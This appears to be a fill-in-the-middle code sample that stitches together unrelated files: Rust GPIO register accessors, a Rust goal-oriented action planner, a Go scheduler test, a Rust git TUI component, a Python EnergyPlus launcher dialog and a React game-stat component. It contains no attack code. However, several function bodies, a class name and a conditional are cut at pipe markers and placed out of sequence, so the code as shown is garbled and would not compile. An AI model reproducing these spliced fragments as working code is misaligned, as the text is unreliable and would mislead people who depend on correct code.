pub fn afrh14(&self) -> AFRH14_R {
AFRH14_R::new(((self.bits >> 24) & 0x0f) as u8)
}
#[doc = "Bits 20:23 - Alternate function selection for port x bit y (y = 8..15)"]
#[inline(always)]
pub fn afrh13(&self) -> AFRH13_R {
AFRH13_R::new(((self.bits >> 20) & 0x0f) as u8)
}
#[doc = "Bits 16:19 - Alternate function selection for port x bit y (y = 8..15)"]
#[inline(always)]
pub fn afrh12(&self) -> AFRH12_R {
AFRH12_R::new(((self.bits >> 16) & 0x0f) as u8)
}
#[doc = "Bits 12:15 - Alternate function selection for port x bit y (y = 8..15)"]
#[inline(always)]
pub fn afrh11(&self) -> AFRH11_R {
AFRH11_R::new(((self.bits >> 12) & 0x0f) as u8)
}
#[doc = "Bits 8:11 - Alternate function selection for port x bit y (y = 8..15)"]
#[inline(always)]
pub fn afrh10(&self) -> AFRH10_R {
AFRH10_R::new(((self.bits >> 8) & 0x0f) as u8)
}
#[doc = "Bits 4:7 - Alternate function selection for port x bit y (y = 8..15)"]
#[inline(always)]
pub fn afrh9(&self) -> AFRH9_R {
AFRH9_R::new(((self.bits >> 4) & 0x0f) as u8)
}
#[doc = "Bits 0:3 - Alternate function selection for port x bit y (y = 8..15)"]
#[inline(always)]
pub fn afrh8(&self) -> AFRH8_R {
AFRH8_R::new((self.bits & 0x0f) as u8)
}
}
impl W {
#[doc = "Bits 28:31 - Alternate function selection for port x bit y (y = 8..15)"]
#[inline(always)]
pub fn afrh15(&mut self) -> AFRH15_W {
AFRH15_W { w: self }
}
#[doc = "Bits 24:27 - Alternate function selection for port x bit y (y = 8..15)"]
#[inline(always)]
pub fn afrh14(&mut self) -> AFRH14_W {
AFRH14_W { w: self }
}
#[doc = "Bits 20:23 - Alternate function selection for port x bit y (y = 8..15)"]
#[inline(always)]
pub fn afrh13(&mut self) -> AFRH13_W {
AFRH13_W { w: self }
}
#[doc = "Bits 16:19 - Alternate function selection for port x bit y (y = 8..15)"]
#[inline(always)]
pub fn afrh12(&mut self) -> AFRH12_W |
#[doc = "Bits 12:15 - Alternate function selection for port x bit y (y = 8..15)"]
#[inline(always)]
pub fn afrh11(&mut self) -> AFRH11_W {
AFRH11_W { w: self }
}
#[doc = "Bits 8:11 - Alternate function selection for port x bit y (y = 8..15)"]
#[inline(always)]
pub fn afrh10(&mut self) -> AFRH10_W {
AFRH10_W { w: self }
}
#[doc = "Bits 4:7 - Alternate function selection for port x bit y (y = 8..15)"]
#[inline(always)]
pub fn afrh9(&mut self) -> AFRH9_W {
AFRH9_W { w: self }
}
#[doc = "Bits 0:3 - Alternate function selection for port x bit y (y = 8..15)"]
#[inline(always)]
pub fn afrh8(&mut self) -> AFRH8_W {
AFRH8_W { w: self }
}
}
| {
AFRH12_W { w: self }
} |
lib.rs | // Copyright 2017 Samuel Loretan <[email protected]> -- See LICENSE file
//! A Rust implementation of Orkin's Goal-Oriented Action-Planning (GOAP).
//!
//! ## Usage
//!
//! Add the rgoap dependency to `Cargo.toml`:
//!
//! ```toml
//! [dependencies]
//! rgoap = "0.1"
//! ```
//!
//! And use the crate as such:
//!
//! ```rust
//! extern crate rgoap;
//!
//! use rgoap::{State, Action, plan};
//!
//! # fn main() {
//! // The actions your planner will be allowed to use.
//! let mut walk_to_dog = Action::new("walk_to_dog".to_string(), 1);
//! walk_to_dog.pre_conditions.insert("dog_person".to_string(), true);
//! walk_to_dog.post_conditions.insert("near_dog".to_string(), true);
//!
//! let mut dog_wiggles_tail = Action::new("dog_wiggles_tail".to_string(), 1);
//! dog_wiggles_tail.pre_conditions.insert("dog_happy".to_string(), true);
//! dog_wiggles_tail.post_conditions.insert("tails_wiggling".to_string(), true);
//!
//! let mut pet_dog = Action::new("pet_dog".to_string(), 1);
//! pet_dog.pre_conditions.insert("near_dog".to_string(), true);
//! pet_dog.post_conditions.insert("dog_happy".to_string(), true);
//!
//! let possible_actions = [walk_to_dog, pet_dog, dog_wiggles_tail];
//!
//! // This is the initial state of the world.
//! let mut initial_state = State::new();
//! initial_state.insert("near_dog".to_string(), false);
//! initial_state.insert("dog_person".to_string(), true);
//! initial_state.insert("dog_happy".to_string(), false);
//! initial_state.insert("tails_wiggling".to_string(), false);
//!
//! // And this is the target state. Note that it doesn't have to include all of the states.
//! let mut goal_state = State::new();
//! goal_state.insert("tails_wiggling".to_string(), true);
//!
//! // Let's find which actions needs to happen to get there.
//! let planned_actions = plan(&initial_state, &goal_state, &possible_actions).unwrap();
//!
//! // Are the actions what we expected?
//! let planned_actions_names: Vec<String> =
//! planned_actions.iter().map(|&action| action.name.clone()).collect();
//! let expected_actions_names =
//! vec!["walk_to_dog".to_string(), "pet_dog".to_string(), "dog_wiggles_tail".to_string()];
//! assert_eq!(planned_actions_names, expected_actions_names);
//! # }
//! ```
#[macro_use]
#[cfg(feature = "use_serde")]
extern crate serde_derive;
#[cfg(feature = "use_serde")]
extern crate serde;
extern crate pathfinding;
use std::collections::BTreeMap;
use std::hash::{Hash, Hasher};
use pathfinding::prelude::astar;
/// A map of state atoms to their values.
pub type State = BTreeMap<String, bool>;
/// An action that can be used to influence the world state.
#[cfg_attr(feature = "use_serde", derive(Serialize, Deserialize))]
#[derive(PartialEq, Eq)]
pub struct Action {
pub name: String,
pub cost: usize,
pub pre_conditions: State,
pub post_conditions: State,
}
impl Action {
pub fn new(name: String, cost: usize) -> Action {
Action {
name: name,
cost: cost,
pre_conditions: State::new(),
post_conditions: State::new(),
}
}
}
/// A node in the planner graph.
#[derive(PartialEq, Eq, Clone)]
struct PlanNode<'a> {
current_state: State,
action: Option<&'a Action>,
}
impl<'a> Hash for PlanNode<'a> {
fn hash<H>(&self, state: &mut H)
where H: Hasher
{
if let Some(action) = self.action {
action.name.hash(state);
}
for (key, value) in &self.current_state {
key.hash(state);
value.hash(state);
}
}
}
impl<'a> PlanNode<'a> {
/// Makes an initial plan node without a parent.
fn initial(initial_state: &'a State) -> PlanNode<'a> {
PlanNode {
current_state: initial_state.clone(),
action: None,
}
}
/// Makes a plan node from a parent state and an action applied to that state.
fn child(parent_state: State, action: &'a Action) -> PlanNode<'a> {
let mut child = PlanNode {
current_state: parent_state.clone(),
action: Some(action),
};
// Applies the post-condition of the action applied on our parent state.
for (name, value) in &action.post_conditions {
child.current_state.insert(name.clone(), value.clone());
}
child
}
/// Returns all possible nodes from this current state, along with the cost to get there.
fn possible_next_nodes(&self, actions: &'a [Action]) -> Vec<(PlanNode<'a>, usize)> {
let mut nodes: Vec<(PlanNode<'a>, usize)> = vec![];
for action in actions {
if self.matches(&action.pre_conditions) {
nodes.push((PlanNode::child(self.current_state.clone(), action), action.cost));
}
}
nodes
}
/// Count the number of states in this node that aren't matching the given target.
fn mismatch_count(&self, target: &State) -> usize {
let mut count: usize = 0;
for (name, target_value) in target {
if let Some(current_value) = self.current_state.get(name) {
if current_value != target_value {
count += 1;
}
} else {
count += 1;
}
}
count
}
/// Returns `true` if the current node is a full match for the given target.
fn matches(&self, target: &State) -> bool {
self.mismatch_count(target) == 0
}
}
/// Formulates a plan to get from an initial state to a goal state using a set of allowed actions.
pub fn plan<'a>(initial_state: &'a State,
goal_state: &State,
allowed_actions: &'a [Action])
-> Option<Vec<&'a Action>> {
// Builds our initial plan node.
let start = PlanNode::initial(initial_state);
// Runs our search over the states graph.
if let Some((plan, _)) = astar(&start,
|ref node| node.possible_next_nodes(allowed_actions),
|ref node| node.mismatch_count(goal_state),
|ref node| node.matches(goal_state)) {
Some(plan.into_iter().skip(1).map(|ref node| node.action.unwrap()).collect())
} else {
None
}
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_edge_cases() {
let mut action = Action::new("action".to_string(), 1);
action.pre_conditions.insert("has_something".to_string(), true);
action.post_conditions.insert("is_winning".to_string(), true);
let actions = [action];
let mut initial_state = State::new();
initial_state.insert("has_something".to_string(), false);
initial_state.insert("is_winning".to_string(), false);
// No viable plan.
{
let mut goal_state = State::new();
goal_state.insert("is_winning".to_string(), true);
let plan = plan(&initial_state, &goal_state, &actions);
assert!(plan.is_none());
}
// The goal state is already reached in the initial state.
{
let mut goal_state = State::new();
goal_state.insert("is_winning".to_string(), false);
let plan = plan(&initial_state, &goal_state, &actions);
assert!(plan.unwrap().len() == 0);
}
// The goal state uses a state missing from the initial state.
{
let mut goal_state = State::new();
goal_state.insert("is_losing".to_string(), false);
let plan = plan(&initial_state, &goal_state, &actions);
assert!(plan.is_none());
}
}
}
#[cfg(test)]
#[cfg(feature = "use_serde")]
mod tests_with_serde {
extern crate serde_json;
use super::*;
use std::path::Path;
use std::fs;
/// A test case
#[derive(Deserialize)]
struct TestCase {
#[serde(skip_deserializing)]
case_name: String,
actions: Vec<Action>,
initial_state: State,
goal_state: State,
expected_actions: Vec<String>,
}
impl TestCase {
/// Loads a test case from a JSON file.
fn from_case_file(path: &Path) -> TestCase {
let file = fs::File::open(path).unwrap(); | let mut case: TestCase = serde_json::from_reader(file).unwrap();
case.case_name = String::from(path.file_name().unwrap().to_str().unwrap());
case
}
/// Checks if the computed plan matches the expectation.
fn assert_plan(&self) {
let plan = plan(&self.initial_state, &self.goal_state, &self.actions);
if let Some(actions_list) = plan {
let actions_names: Vec<String> =
actions_list.iter().map(|&action| action.name.clone()).collect();
if self.expected_actions != actions_names {
panic!("{} failed: expected {:?}, got {:?}",
self.case_name,
self.expected_actions,
actions_names);
}
} else {
if self.expected_actions.len() > 0 {
panic!("{} failed: expected {:?}, got no plan",
self.case_name,
self.expected_actions);
}
}
}
}
#[test]
fn run_test_files() {
let paths = fs::read_dir("./data").unwrap();
for path in paths {
let case = TestCase::from_case_file(path.unwrap().path().as_path());
case.assert_plan();
}
}
} | |
scheduler_test.go | // Copyright 2018 Bull S.A.S. Atos Technologies - Bull, Rue Jean Jaures, B.P.68, 78340, Les Clayes-sous-Bois, France.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package scheduler
import (
"context"
"encoding/json"
"path"
"strconv"
"testing"
"time"
"github.com/hashicorp/consul/api"
"github.com/stretchr/testify/require"
"github.com/ystia/yorc/v4/events"
"github.com/ystia/yorc/v4/helper/consulutil"
"github.com/ystia/yorc/v4/prov"
"github.com/ystia/yorc/v4/prov/scheduling"
"github.com/ystia/yorc/v4/tasks"
)
func testRegisterAction(t *testing.T, client *api.Client) {
t.Parallel()
deploymentID := "dep-" + t.Name()
ti := 1 * time.Second
actionType := "test-action"
action := &prov.Action{ActionType: actionType, Data: map[string]string{"key1": "val1", "key2": "val2", "key3": "val3"}}
id, err := scheduling.RegisterAction(client, deploymentID, ti, action)
require.Nil(t, err, "Unexpected error while registering action")
require.NotEmpty(t, id, "id is not expected to be empty")
// Check action has been registered
sca, err := defaultScheduler.buildScheduledAction(id)
require.Nil(t, err, "Unexpected error while building scheduled action from action id")
require.NotNil(t, sca, "scheduled action is not required to be nil")
require.Equal(t, actionType, sca.ActionType, "Unexpected value for action type")
require.Equal(t, id, sca.ID, "Unexpected value for ID")
require.Equal(t, 3, len(sca.Data), "Unexpected nb of data")
require.Equal(t, "val1", sca.Data["key1"], "Unexpected value for Data[key1]")
require.Equal(t, "val2", sca.Data["key2"], "Unexpected value for Data[key2]")
require.Equal(t, "val3", sca.Data["key3"], "Unexpected value for Data[key3]")
}
func testProceedScheduledAction(t *testing.T, client *api.Client) {
t.Parallel()
deploymentID := "dep-" + t.Name()
ti := 1 * time.Second
actionType := "test-action"
action := &prov.Action{ActionType: actionType, Data: map[string]string{"key1": "val1", "key2": "val2", "key3": "val3"}}
id, err := scheduling.RegisterAction(client, deploymentID, ti, action)
require.Nil(t, err, "Unexpected error while registering action")
require.NotEmpty(t, id, "id is not expected to be empty")
closeCh := make(chan struct{})
defer close(closeCh)
go func() {
var latestIndex uint64
for {
select {
case <-closeCh:
return
default:
}
kvp, meta, err := client.KV().Get(path.Join(consulutil.SchedulingKVPrefix, "actions", id, "latestTaskID"), &api.QueryOptions{WaitIndex: latestIndex})
if err != nil {
t.Logf("%v", err)
continue
}
if latestIndex == meta.LastIndex {
continue
}
// set the related task to done asap to reschedule them
if kvp != nil && len(kvp.Value) > 0 {
taskID := string(kvp.Value)
p := &api.KVPair{Key: path.Join(consulutil.TasksPrefix, taskID, "status"), Value: []byte(strconv.Itoa(int(tasks.TaskStatusDONE)))}
client.KV().Put(p, nil)
}
}
}()
var check = func(index int, cpt *int) {
*cpt++
// Check related tasks have been created
keys, _, err := client.KV().Keys(consulutil.TasksPrefix+"/", "/", nil)
require.Nil(t, err, "Unexpected error while checking actions tasks")
depTask := 0
for _, key := range keys {
kvp, _, err := client.KV().Get(key+"targetId", nil)
if kvp != nil && string(kvp.Value) == deploymentID {
depTask++
kvp, _, err = client.KV().Get(key+"data/actionType", nil)
require.Nil(t, err, "Unexpected error while getting action type")
require.NotNil(t, kvp, "kvp is nil for action type") | kvp, _, err = client.KV().Get(key+"data/key1", nil)
require.Nil(t, err, "Unexpected error while getting key1")
require.NotNil(t, kvp, "kvp is nil for key1")
require.Equal(t, string(kvp.Value), "val1")
kvp, _, err = client.KV().Get(key+"data/key2", nil)
require.Nil(t, err, "Unexpected error while getting key3")
require.NotNil(t, kvp, "kvp is nil for key2")
require.Equal(t, string(kvp.Value), "val2")
kvp, _, err = client.KV().Get(key+"data/key3", nil)
require.Nil(t, err, "Unexpected error while getting key3")
require.NotNil(t, kvp, "kvp is nil for key3")
require.Equal(t, string(kvp.Value), "val3")
}
}
require.Equal(t, index, depTask, "Unexpected nb of tasks")
}
ind := 0
checkCpt := 0
ticker := time.NewTicker(ti)
time.Sleep(2 * time.Second)
for i := 0; i <= 2; i++ {
select {
case <-ticker.C:
ind++
check(ind, &checkCpt)
if ind == 3 {
ticker.Stop()
}
}
}
require.Equal(t, checkCpt, 3, "unexpected number of checks done")
}
func testProceedScheduledActionWithFirstActionStillRunning(t *testing.T, client *api.Client) {
t.Parallel()
ctx := context.Background()
deploymentID := "dep-" + t.Name()
ti := 1 * time.Second
actionType := "test-action"
nodeName := "my-node"
opeName := "my-op"
interfaceName := "my-inter"
taskID := "orig-taskID"
wfName := "my-wf"
action := &prov.Action{ActionType: actionType, Data: map[string]string{"key1": "val1", "key2": "val2", "key3": "val3"},
AsyncOperation: prov.AsyncOperation{DeploymentID: deploymentID, NodeName: nodeName, Operation: prov.Operation{Name: interfaceName + "." + opeName}, TaskID: taskID, WorkflowName: wfName}}
id, err := scheduling.RegisterAction(client, deploymentID, ti, action)
require.Nil(t, err, "Unexpected error while registering action")
require.NotEmpty(t, id, "id is not expected to be empty")
closeCh := make(chan struct{})
defer close(closeCh)
go func() {
var latestIndex uint64
for {
select {
case <-closeCh:
return
default:
}
kvp, meta, err := client.KV().Get(path.Join(consulutil.SchedulingKVPrefix, "actions", id, "latestTaskID"), &api.QueryOptions{WaitIndex: latestIndex})
if err != nil {
t.Logf("%v", err)
continue
}
if latestIndex == meta.LastIndex {
continue
}
// Set the task status to RUNNING in order to not reschedule another task
if kvp != nil && len(kvp.Value) > 0 {
taskID := string(kvp.Value)
p := &api.KVPair{Key: path.Join(consulutil.TasksPrefix, taskID, "status"), Value: []byte(strconv.Itoa(int(tasks.TaskStatusRUNNING)))}
client.KV().Put(p, nil)
}
}
}()
var check = func(index int, cpt *int) {
*cpt++
// Check related tasks have been created
keys, _, err := client.KV().Keys(consulutil.TasksPrefix+"/", "/", nil)
require.Nil(t, err, "Unexpected error while checking actions tasks")
depTask := 0
for _, key := range keys {
kvp, _, err := client.KV().Get(key+"targetId", nil)
if kvp != nil && string(kvp.Value) == deploymentID {
depTask++
kvp, _, err = client.KV().Get(key+"data/actionType", nil)
require.Nil(t, err, "Unexpected error while getting action type")
require.NotNil(t, kvp, "kvp is nil for action type")
require.Equal(t, string(kvp.Value), actionType)
kvp, _, err = client.KV().Get(key+"data/key1", nil)
require.Nil(t, err, "Unexpected error while getting key1")
require.NotNil(t, kvp, "kvp is nil for key1")
require.Equal(t, string(kvp.Value), "val1")
kvp, _, err = client.KV().Get(key+"data/key2", nil)
require.Nil(t, err, "Unexpected error while getting key3")
require.NotNil(t, kvp, "kvp is nil for key2")
require.Equal(t, string(kvp.Value), "val2")
kvp, _, err = client.KV().Get(key+"data/key3", nil)
require.Nil(t, err, "Unexpected error while getting key3")
require.NotNil(t, kvp, "kvp is nil for key3")
require.Equal(t, string(kvp.Value), "val3")
}
}
require.Equal(t, index, depTask, "Unexpected nb of tasks")
}
ind := 0
checkCpt := 0
ticker := time.NewTicker(ti)
time.Sleep(2 * time.Second)
for i := 0; i <= 2; i++ {
select {
case <-ticker.C:
ind++
// as the task is still running, no other task is created
check(1, &checkCpt)
if ind == 3 {
ticker.Stop()
}
}
}
require.Equal(t, checkCpt, 3, "unexpected number of checks done")
logs, _, err := events.LogsEvents(ctx, deploymentID, 0, 5*time.Second)
require.NoError(t, err, "Could not retrieve logs")
require.Equal(t, true, len(logs) > 0, "expected at least one logged event")
var data map[string]interface{}
err = json.Unmarshal(logs[0], &data)
require.Nil(t, err)
require.Equal(t, taskID, data["executionId"], "unexpected event executionID")
require.Equal(t, wfName, data["workflowId"], "unexpected event workflowId")
require.Equal(t, nodeName, data["nodeId"], "unexpected event nodeId")
require.Equal(t, interfaceName, data["interfaceName"], "unexpected event interfaceName")
require.Equal(t, opeName, data["operationName"], "unexpected event operationName")
}
func testProceedScheduledActionWithBadStatusError(t *testing.T, client *api.Client) {
t.Parallel()
deploymentID := "dep-" + t.Name()
ti := 1 * time.Second
actionType := "test-action"
action := &prov.Action{ActionType: actionType, Data: map[string]string{"key1": "val1", "key2": "val2", "key3": "val3"}}
id, err := scheduling.RegisterAction(client, deploymentID, ti, action)
require.Nil(t, err, "Unexpected error while registering action")
require.NotEmpty(t, id, "id is not expected to be empty")
closeCh := make(chan struct{})
defer close(closeCh)
go func() {
var latestIndex uint64
for {
select {
case <-closeCh:
return
default:
}
kvp, meta, err := client.KV().Get(path.Join(consulutil.SchedulingKVPrefix, "actions", id, "latestTaskID"), &api.QueryOptions{WaitIndex: latestIndex})
if err != nil {
t.Logf("%v", err)
continue
}
if latestIndex == meta.LastIndex {
continue
}
// Set the task status to RUNNING in order to not reschedule another task
if kvp != nil && len(kvp.Value) > 0 {
taskID := string(kvp.Value)
p := &api.KVPair{Key: path.Join(consulutil.TasksPrefix, taskID, "status"), Value: []byte("BAD")}
client.KV().Put(p, nil)
}
}
}()
var check = func(index int, cpt *int) {
*cpt++
// Check related tasks have been created
keys, _, err := client.KV().Keys(consulutil.TasksPrefix+"/", "/", nil)
require.Nil(t, err, "Unexpected error while checking actions tasks")
depTask := 0
for _, key := range keys {
kvp, _, err := client.KV().Get(key+"targetId", nil)
if kvp != nil && string(kvp.Value) == deploymentID {
depTask++
kvp, _, err = client.KV().Get(key+"data/actionType", nil)
require.Nil(t, err, "Unexpected error while getting action type")
require.NotNil(t, kvp, "kvp is nil for action type")
require.Equal(t, string(kvp.Value), actionType)
kvp, _, err = client.KV().Get(key+"data/key1", nil)
require.Nil(t, err, "Unexpected error while getting key1")
require.NotNil(t, kvp, "kvp is nil for key1")
require.Equal(t, string(kvp.Value), "val1")
kvp, _, err = client.KV().Get(key+"data/key2", nil)
require.Nil(t, err, "Unexpected error while getting key3")
require.NotNil(t, kvp, "kvp is nil for key2")
require.Equal(t, string(kvp.Value), "val2")
kvp, _, err = client.KV().Get(key+"data/key3", nil)
require.Nil(t, err, "Unexpected error while getting key3")
require.NotNil(t, kvp, "kvp is nil for key3")
require.Equal(t, string(kvp.Value), "val3")
}
}
require.Equal(t, index, depTask, "Unexpected nb of tasks")
}
ind := 0
checkCpt := 0
ticker := time.NewTicker(ti)
time.Sleep(2 * time.Second)
for i := 0; i <= 2; i++ {
select {
case <-ticker.C:
ind++
// as the proceed returns an error, the scheduler will stop and only one task will be created
check(1, &checkCpt)
if ind == 3 {
ticker.Stop()
}
}
}
require.Equal(t, checkCpt, 3, "unexpected number of checks done")
}
func testUnregisterAction(t *testing.T, client *api.Client) {
t.Parallel()
deploymentID := "dep-" + t.Name()
ti := 1 * time.Second
actionType := "test-action"
action := &prov.Action{ActionType: actionType, Data: map[string]string{"key1": "val1", "key2": "val2", "key3": "val3"}}
id, err := scheduling.RegisterAction(client, deploymentID, ti, action)
require.Nil(t, err, "Unexpected error while registering action")
require.NotEmpty(t, id, "id is not expected to be empty")
err = scheduling.UnregisterAction(client, id)
require.Nil(t, err, "Unexpected error while unregistering action")
kvp, _, err := client.KV().Get(path.Join(consulutil.SchedulingKVPrefix, "actions", id, ".unregisterFlag"), nil)
require.Nil(t, err, "Unexpected error while getting flag for removal")
require.NotNil(t, kvp, "kvp is nil")
require.Equal(t, "true", string(kvp.Value), "unregisterFlag is not set to true")
} | require.Equal(t, string(kvp.Value), actionType)
|
compare_commits.rs | use super::{
command_pump, event_pump, visibility_blocking, CommandBlocking,
CommandInfo, CommitDetailsComponent, Component, DiffComponent,
DrawableComponent, EventState, InspectCommitOpen,
};
use crate::{
accessors,
keys::SharedKeyConfig,
queue::{InternalEvent, Queue, StackablePopupOpen},
strings,
ui::style::SharedTheme,
};
use anyhow::Result;
use asyncgit::{
sync::{self, diff::DiffOptions, CommitId, RepoPathRef},
AsyncDiff, AsyncGitNotification, CommitFilesParams, DiffParams,
DiffType,
};
use crossbeam_channel::Sender;
use crossterm::event::Event;
use tui::{
backend::Backend,
layout::{Constraint, Direction, Layout, Rect},
widgets::Clear,
Frame,
};
pub struct CompareCommitsComponent {
repo: RepoPathRef,
open_request: Option<InspectCommitOpen>,
diff: DiffComponent,
details: CommitDetailsComponent,
git_diff: AsyncDiff,
visible: bool,
key_config: SharedKeyConfig,
queue: Queue,
}
impl DrawableComponent for CompareCommitsComponent {
fn draw<B: Backend>(
&self,
f: &mut Frame<B>,
rect: Rect,
) -> Result<()> {
if self.is_visible() {
let percentages = if self.diff.focused() {
(30, 70)
} else {
(50, 50)
};
let chunks = Layout::default()
.direction(Direction::Horizontal)
.constraints(
[
Constraint::Percentage(percentages.0),
Constraint::Percentage(percentages.1),
]
.as_ref(),
)
.split(rect);
f.render_widget(Clear, rect);
self.details.draw(f, chunks[0])?;
self.diff.draw(f, chunks[1])?;
}
Ok(())
}
}
impl Component for CompareCommitsComponent {
fn commands(
&self,
out: &mut Vec<CommandInfo>,
force_all: bool,
) -> CommandBlocking |
fn event(&mut self, ev: Event) -> Result<EventState> {
if self.is_visible() {
if event_pump(ev, self.components_mut().as_mut_slice())?
.is_consumed()
{
if !self.details.is_visible() {
self.hide_stacked(true);
}
return Ok(EventState::Consumed);
}
if let Event::Key(e) = ev {
if e == self.key_config.keys.exit_popup {
self.hide_stacked(false);
} else if e == self.key_config.keys.focus_right
&& self.can_focus_diff()
{
self.details.focus(false);
self.diff.focus(true);
} else if e == self.key_config.keys.focus_left
&& self.diff.focused()
{
self.details.focus(true);
self.diff.focus(false);
} else if e == self.key_config.keys.focus_left {
self.hide_stacked(false);
}
return Ok(EventState::Consumed);
}
}
Ok(EventState::NotConsumed)
}
fn is_visible(&self) -> bool {
self.visible
}
fn hide(&mut self) {
self.visible = false;
}
fn show(&mut self) -> Result<()> {
self.visible = true;
self.details.show()?;
self.details.focus(true);
self.diff.focus(false);
self.update()?;
Ok(())
}
}
impl CompareCommitsComponent {
accessors!(self, [diff, details]);
///
pub fn new(
repo: &RepoPathRef,
queue: &Queue,
sender: &Sender<AsyncGitNotification>,
theme: SharedTheme,
key_config: SharedKeyConfig,
) -> Self {
Self {
repo: repo.clone(),
details: CommitDetailsComponent::new(
repo,
queue,
sender,
theme.clone(),
key_config.clone(),
),
diff: DiffComponent::new(
repo.clone(),
queue.clone(),
theme,
key_config.clone(),
true,
),
open_request: None,
git_diff: AsyncDiff::new(repo.borrow().clone(), sender),
visible: false,
key_config,
queue: queue.clone(),
}
}
///
pub fn open(&mut self, open: InspectCommitOpen) -> Result<()> {
let compare_id = if let Some(compare_id) = open.compare_id {
compare_id
} else {
sync::get_head_tuple(&self.repo.borrow())?.id
};
self.open_request = Some(InspectCommitOpen {
commit_id: open.commit_id,
compare_id: Some(compare_id),
tags: open.tags,
});
self.show()?;
Ok(())
}
///
pub fn any_work_pending(&self) -> bool {
self.git_diff.is_pending() || self.details.any_work_pending()
}
///
pub fn update_git(
&mut self,
ev: AsyncGitNotification,
) -> Result<()> {
if self.is_visible() {
if ev == AsyncGitNotification::CommitFiles {
self.update()?;
} else if ev == AsyncGitNotification::Diff {
self.update_diff()?;
}
}
Ok(())
}
fn get_ids(&self) -> Option<(CommitId, CommitId)> {
let other = self
.open_request
.as_ref()
.and_then(|open| open.compare_id);
self.open_request
.as_ref()
.map(|open| open.commit_id)
.zip(other)
}
/// called when any tree component changed selection
pub fn update_diff(&mut self) -> Result<()> {
if self.is_visible() {
if let Some(ids) = self.get_ids() {
if let Some(f) = self.details.files().selection_file()
{
let diff_params = DiffParams {
path: f.path.clone(),
diff_type: DiffType::Commits(ids),
options: DiffOptions::default(),
};
if let Some((params, last)) =
self.git_diff.last()?
{
if params == diff_params {
self.diff.update(f.path, false, last);
return Ok(());
}
}
self.git_diff.request(diff_params)?;
self.diff.clear(true);
return Ok(());
}
}
self.diff.clear(false);
}
Ok(())
}
fn update(&mut self) -> Result<()> {
self.details.set_commits(
self.get_ids().map(CommitFilesParams::from),
None,
)?;
self.update_diff()?;
Ok(())
}
fn can_focus_diff(&self) -> bool {
self.details.files().selection_file().is_some()
}
fn hide_stacked(&mut self, stack: bool) {
self.hide();
if stack {
if let Some(request) = self.open_request.clone() {
self.queue.push(InternalEvent::PopupStackPush(
StackablePopupOpen::CompareCommits(request),
));
}
} else {
self.queue.push(InternalEvent::PopupStackPop);
}
}
}
| {
if self.is_visible() || force_all {
command_pump(
out,
force_all,
self.components().as_slice(),
);
out.push(
CommandInfo::new(
strings::commands::close_popup(&self.key_config),
true,
true,
)
.order(1),
);
out.push(CommandInfo::new(
strings::commands::diff_focus_right(&self.key_config),
self.can_focus_diff(),
!self.diff.focused() || force_all,
));
out.push(CommandInfo::new(
strings::commands::diff_focus_left(&self.key_config),
true,
self.diff.focused() || force_all,
));
}
visibility_blocking(self)
} |
welcome_dialog.py | import webbrowser
import wx
from eplaunch import DOCS_URL, VERSION
# wx callbacks need an event argument even though we usually don't use it, so the next line disables that check
# noinspection PyUnusedLocal
class | (wx.Dialog):
CLOSE_SIGNAL_OK = 0
def __init__(self, *args, **kwargs):
super(WelcomeDialog, self).__init__(*args, **kwargs)
self.SetTitle("EP-Launch")
this_border = 12
self.panel = wx.Panel(self, wx.ID_ANY)
title = wx.StaticText(self.panel, wx.ID_ANY, 'Welcome to EP-Launch ' + VERSION)
message = """
EP-Launch has been around for many years as a part of the EnergyPlus distribution.
Starting with the 3.0 release, it has changed drastically, completely redesigned and rewritten.
For full documentation or a quick start guide, click the "Open Docs" button below.
This dialog will only be shown once, but documentation is available in the Help menu.
"""
text_description = wx.StaticText(self.panel, wx.ID_ANY, message, style=wx.ALIGN_CENTRE_HORIZONTAL)
ok_button = wx.Button(self.panel, label='OK')
docs_button = wx.Button(self.panel, label='Open Docs')
self.Bind(wx.EVT_CLOSE, self.handle_close_ok)
ok_button.Bind(wx.EVT_BUTTON, self.handle_close_ok)
docs_button.Bind(wx.EVT_BUTTON, self.handle_open_docs)
button_row_sizer = wx.BoxSizer(wx.HORIZONTAL)
button_row_sizer.Add(ok_button, flag=wx.LEFT | wx.RIGHT | wx.ALIGN_CENTER_VERTICAL, border=this_border)
button_row_sizer.Add(docs_button, flag=wx.LEFT | wx.RIGHT | wx.ALIGN_CENTER_VERTICAL, border=this_border)
sizer_main_vertical = wx.BoxSizer(wx.VERTICAL)
sizer_main_vertical.Add(title, 0, wx.CENTER | wx.ALL, border=this_border)
sizer_main_vertical.Add(text_description, proportion=1, flag=wx.ALL | wx.EXPAND, border=this_border)
sizer_main_vertical.Add(button_row_sizer, flag=wx.ALL | wx.ALIGN_CENTER, border=this_border)
self.panel.SetSizer(sizer_main_vertical)
sizer_main_vertical.Fit(self)
def handle_open_docs(self, e):
webbrowser.open(DOCS_URL)
def handle_close_ok(self, e):
self.EndModal(WelcomeDialog.CLOSE_SIGNAL_OK)
| WelcomeDialog |
ShootingPhaseDetails.tsx | import React from 'react'
import { StatBadge } from '../StatBadge'
import AbilityList from './AbilityList'
import WeaponList from './WeaponList'
import { Row, Col } from 'react-bootstrap'
import { ModelTitle } from '../ModelTitle'
import { Model } from '../../types/KillTeam2018'
interface Props {
model: Model
}
export function ShootingPhaseDetails (props: Props) {
return (
<Row>
<Col sm='10'>
<ModelTitle {...props.model} />
{hasRangedWeapons(props.model) && <WeaponList weapons={props.model.weapons} phase='shooting' userStrength={props.model.stats.strength} />}
<AbilityList abilities={props.model.abilities} phase='shooting' />
</Col>
<Col sm='1' className='px-1'>
{hasRangedWeapons(props.model) && <StatBadge name='BS' value={`${props.model.stats.ballistic_skill}`} secondaryValue='+' />}
<StatBadge name='T' value={`${props.model.stats.toughness}`} />
</Col>
<Col sm='1' className='px-1'>
<StatBadge name='Sv' value={`${props.model.stats.save}`} secondaryValue='+' />
{props.model.stats.invulnerable_save | </Col>
</Row>
)
}
export function hasRangedWeapons (model: Model) {
return !isNaN(model.stats.ballistic_skill) && (model.weapons.filter((x) => (x.type !== 'Melee')).length > 0)
} | ? <StatBadge name='Inv' value={`${props.model.stats.invulnerable_save}`} secondaryValue='+' />
: <></>} |
